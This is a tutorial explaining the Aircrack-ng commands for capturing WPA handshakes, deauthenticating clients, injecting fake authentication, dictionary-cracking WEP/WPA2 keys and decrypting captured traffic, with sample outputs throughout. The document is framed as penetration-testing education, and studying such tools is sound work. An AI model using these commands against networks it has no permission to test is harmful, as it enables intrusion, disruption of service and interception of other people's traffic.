Aircrack-ng : Cracking WEP , WPA/WPA2 WiFi Passwords

This detailed guide explains every Aircrack-ng command with comprehensive insights into how they work, why they are used, and the meaning of their outputs. This walkthrough includes each tool in the suite: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and airdecap-ng.

1. airmon-ng: Monitor Mode Management

Purpose:

The airmon-ng tool enables and manages monitor mode on wireless interfaces, which is essential for packet capturing and injection. Monitor mode allows a wireless adapter to listen to all wireless traffic in its range, irrespective of whether it is intended for the device.

Syntax:

sudo airmon-ng start <interface>

Example:

sudo airmon-ng start wlan0

Output:

Interface       Chipset         Driver
wlan0           Atheros         ath9k

PHY Interface Driver     Chipset
phy0 wlan0     ath9k      Qualcomm Atheros

(kill processes interfering with monitor mode)

Breakdown:

• Interface: The network interface card (NIC) to switch to monitor mode.
• Driver: The driver managing the interface (e.g., ath9k).
• Chipset: The wireless chipset (e.g., Qualcomm Atheros).
• Kill interfering processes: Certain background processes (e.g., NetworkManager) may disrupt monitor mode. airmon-ng detects and prompts you to kill them.

2. airodump-ng: Network Monitoring and Packet Capture

Purpose:

airodump-ng listens for wireless network traffic, identifying networks in range and capturing packets. It provides details about each network, such as SSID, encryption type, and connected devices.

Syntax:

sudo airodump-ng <interface>

Example:

sudo airodump-ng wlan0mon

Output:

 CH  8 ][ Elapsed: 2 mins ][ 2024-11-17 11:35 ][ wlan0mon ]

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH ESSID
 12:34:56:78:90:AB  -45      120      200       6   54e  WPA2 CCMP   PSK  TargetNetwork
 DE:AD:BE:EF:01:02  -65      80       90        11  54e  WEP  WEP     OPN  OpenNetwork

Breakdown:

• BSSID: The MAC address of the access point.
• PWR: Signal strength (closer to 0 means stronger).
• Beacons: Periodic packets sent by the access point to announce its presence.
• #Data: Number of data packets captured.
• #/s: Data packet rate.
• CH: Channel used by the network.
• ENC: Encryption type (WPA2, WPA, WEP, or OPN for open networks).
• CIPHER: Encryption cipher (e.g., CCMP or TKIP for WPA2).
• AUTH: Authentication method (e.g., PSK for pre-shared key).
• ESSID: Network name (SSID).

Capturing Packets for a Specific Network:

sudo airodump-ng -c <channel> --bssid <BSSID> -w <output file> <interface>

Example:

sudo airodump-ng -c 6 --bssid 12:34:56:78:90:AB -w capture wlan0mon

Output:

 CH  6 ][ Elapsed: 1 min ][ 2024-11-17 11:45 ][ wlan0mon ]

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH ESSID
 12:34:56:78:90:AB  -50       30      150      6    54e  WPA2 CCMP   PSK  TargetNetwork

WPA handshake: 12:34:56:78:90:AB

• WPA handshake: Indicates the capture of the handshake packets needed for cracking WPA/WPA2 passwords.

3. aireplay-ng: Packet Injection and Replay

Purpose:

aireplay-ng injects packets into a network, enabling traffic generation or targeted attacks like deauthentication.

a. Deauthentication Attack

Deauth attacks disconnect clients from an access point, forcing them to reconnect, which helps capture handshake packets.

Syntax:

sudo aireplay-ng --deauth <count> -a <BSSID> [-c <client MAC>] <interface>

Example:

sudo aireplay-ng --deauth 10 -a 12:34:56:78:90:AB -c 34:56:78:90:AB:CD wlan0mon

Output:

Sending 10 deauth packets to BSSID 12:34:56:78:90:AB
Target: 34:56:78:90:AB:CD

• -a: Specifies the access point’s BSSID.
• -c: Optional; targets a specific client.
• Deauth packets: Packets are sent to disconnect clients.

b. Fake Authentication Attack

Associates the device with the target network to inject packets.

Syntax:

sudo aireplay-ng --fakeauth <delay> -a <BSSID> -h <client MAC> <interface>

Example:

sudo aireplay-ng --fakeauth 0 -a 12:34:56:78:90:AB -h 34:56:78:90:AB:CD wlan0mon

Output:

Sending Authentication Request (Open System)
Authentication successful.

4. aircrack-ng: Password Cracking

Purpose:

aircrack-ng cracks WEP and WPA/WPA2 keys using brute force or dictionary attacks on captured packets.

Syntax:

sudo aircrack-ng -w <wordlist> -b <BSSID> <capture file>

a. WEP Cracking

For WEP cracking, it requires sufficient IV (Initialization Vector) packets.

Example:

sudo aircrack-ng -b 12:34:56:78:90:AB capture.cap

Output:

KEY FOUND! [ 11:22:33:44:55 ]

b. WPA/WPA2 Cracking

Uses a dictionary file to test possible passwords against the captured handshake.

Example:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 12:34:56:78:90:AB handshake.cap

Output:

Reading packets from handshake.cap
KEY FOUND! [ mysecurepassword ]

• -w: Path to the dictionary file.
• -b: BSSID of the target network.

5. airdecap-ng: Decrypting Packets

Purpose:

airdecap-ng decrypts encrypted packets captured during network monitoring.

Syntax:

sudo airdecap-ng -e <ESSID> -p <password> <capture file>

Example:

sudo airdecap-ng -e TargetNetwork -p mysecurepassword capture.cap

Output:

Total number of packets: 500
Number of WEP decrypted packets: 0
Number of WPA decrypted packets: 500

• -e: Specifies the ESSID.
• -p: Specifies the password.

Common Troubleshooting Outputs

"No Wireless Interfaces Found"

• Ensure your Wi-Fi card is supported.
• Run ifconfig, ip a or iwconfig to check for wireless interfaces.

"Could Not Set Monitor Mode"

• Ensure interfering processes (e.g., NetworkManager) are stopped:

  sudo airmon-ng check kill
  

Final Notes

Each command in the Aircrack-ng suite serves a specific purpose in the workflow of wireless security testing. Properly understanding these tools and their outputs is key to effective penetration testing. Always ensure ethical and lawful usage, and obtain explicit permission before testing any network.